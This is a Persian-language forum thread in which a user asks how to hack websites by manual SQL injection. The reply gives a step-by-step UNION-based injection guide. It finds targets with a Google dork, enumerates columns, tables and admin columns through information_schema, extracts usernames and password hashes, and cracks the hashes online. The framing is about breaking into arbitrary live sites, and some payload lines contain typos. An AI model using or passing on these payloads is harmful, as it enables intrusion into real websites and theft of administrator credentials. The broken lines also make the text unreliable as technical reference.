رفتن به مطلب
انجمن تیم امنیتی گارد ایران

اموزش دستی sql


ارسال های توصیه شده

سلام دوستان اموزش هک سایت به روشsql  دستی تو انجمن گشتم ناقص گفتن اگه کسی میدونه اموزششو بگه 
مرسی

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

سلام دوستان اموزش هک سایت به روشsql  دستی تو انجمن گشتم ناقص گفتن اگه کسی میدونه اموزششو بگه 

مرسی

سلام به همه...!ا
SQLامروز اومدم با هک سايت با باگ (اس کيو ال)ا
sqlنکته:براي هک سايت باگ هاي مختلفي است اما ما با باگ اموزش ميدم
نکته:براي فهميدن اين که سايت باگ (اس کيو ال) دارد يا نه
اخر اسم ان بايد اين باشد
faq.php?id=XX
به جاي 
xx
يک عدد
است
مثال:
براي اينکه مطما بشيم بايد در اخر ان ( ' ) حرف را بگزاريم و اينتر بزنيم
حالا اگر ارور داد و در بين ارور ان اين حرف 
Sql
بود قابل هک اما اگه نبود ول کن بريم سايت بعدي
براي اينکه سايت هايي پيدا کنيم که
faq.php?id=XX
داشته باشد در گوگل سرچ کنيد
inurl:"php?id="
حالا بيشتر سايت هايي که مياد تقريبا قابل هک است
خوب بريم ادامه کار تا اينجا فرض ميکنيم در ارور حرف
SQl
بود
2________________________________
حالا در اخر اسم سايت ميزنيم
+order+by+X--
به جاي "ايکس" اعدادي ميگزاريم تا اخرين عدد را پيدا کنيم مثلا عدد5 سايت سالمه
6سالمه 7سالمه 8سالمه 9ارور ميده پس بايد انقدر عدد بديم تا بفهميم اخرين ستون کدام است
مثال
3____________________________________________
خوب حالا ميخواهيم بفهميم کدام ستون نفوظ پزير است ميزنيم
+union+select+1,2,3,4,5,6,7,8,9,10--
از 1 شروع ميکنيم تا به اخرين عددي که در مرحله 2 پيدا کرديم
مثال
در بالا ارور ميدهد چرا؟
بايد در قبل از 2
faq.php?id=2
يک (-)بزايم مثال
حالا در همان سايت يک جواب ميدهد که در اين جواب يک عدد است
که اين عدد همان سوتون قابل نفوظ است
4__________________________________________________ 
براي پيدا کردن ورژن ديتل بيس ميزنيم
+union+select+1,2,3,version(),5,6,7,8,9,10--
نکته:در بالا من حرف ورژن را به جاي 4 قرار دادم شما به جاي سوتون باز قرار دهيد
(همان عدد که در قسمت 3 بدست اورديم گفتيم قابل نفوظ است)
حالا جوابي ميايد به که ورژن را نوشته مثال
5____________________________________
بدست اوردن ديتا بيس
+union+select+1,2,3,database(),5,6,7,8,9,10--
نکته:در بالا من حرف ديتا بيس را به جاي 4 قرار دادم شما به جاي سوتون باز قرار دهيد
(همان عدد که در قسمت 3 بدست اورديم گفتيم قابل نفوظ است)
حالا جوابي ميايد که ديتابيس را نوشته
مثال
6___________________________________________
گرفتن تيبل ادمين
اين مد را به اخر سايت اضافه ميکنيم تا نام :تيبل ها" را بدست اوريم
+union+select+1,group_concat(table_name),3,4+from+information_schema.tables-- 
حالا نام تيبل ها به رديف مياد ما بايد بنبال اين تيبل ها بگرديم
(admins,admin,user,users)يا نام هايي شبيه اين
اگر اينجور نام هارا نجستيد ديگه سايت به درد نميخوره بايد برين يک سايت ديگه
فرص کنيم حرف 
userبود
name tabel admin sait = "user"
7__________________________________________
بدست اوردن "کولدومن"هاي ادمين
اين کد را اخر سايت اضافه ميکنيم
union+select+1,group_concat(column_name),3,4+from+informaion_schema.columns+where+table_Name=XXX--
XXXبه جاي
نام "تيبل"که در مرحله 6 بدست اورديد وارد کنيد
مثال
union+select+1,group_concat(column_name),3,4+from+informaion_schema.columns+where+table_Name=user--
حالا نام تيبل هاي ادمين مياد
8_________________________________________________
بدست اوردن يوزر
+union+select+1,C,3,4_from+T--
T=Name table ke be dast avadid
C=name column ke be dast ovordid bedid 
((کولدوم هاي زيادي بدست مياد براي بدست اوردن يوزر ان مولدووم هاي که نامشون شبيه يوزر است وارد کنيد))
9__________________________________________________
بدست اوردن پسوورد
+union+select+1,C,3,4_from+T--
T=Name table ke be dast avadid
C=name column ke be dast ovordid bedid 
((کولدوم هاي زيادي بدست مياد براي بدست اوردن يوزر ان کولدووم هاي که نامشون شبيه پسوورد هست را بدهيد است وارد کنيد))
10_______________________________________
پسوردي که بدست مياد بشکل هاش کد مياد
براي اينک کد به صورت صبيعي شود وارد سايت
md5decrypter.co.uk
شويد 
و هاش کد بدست امده را وارد کنيد
لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...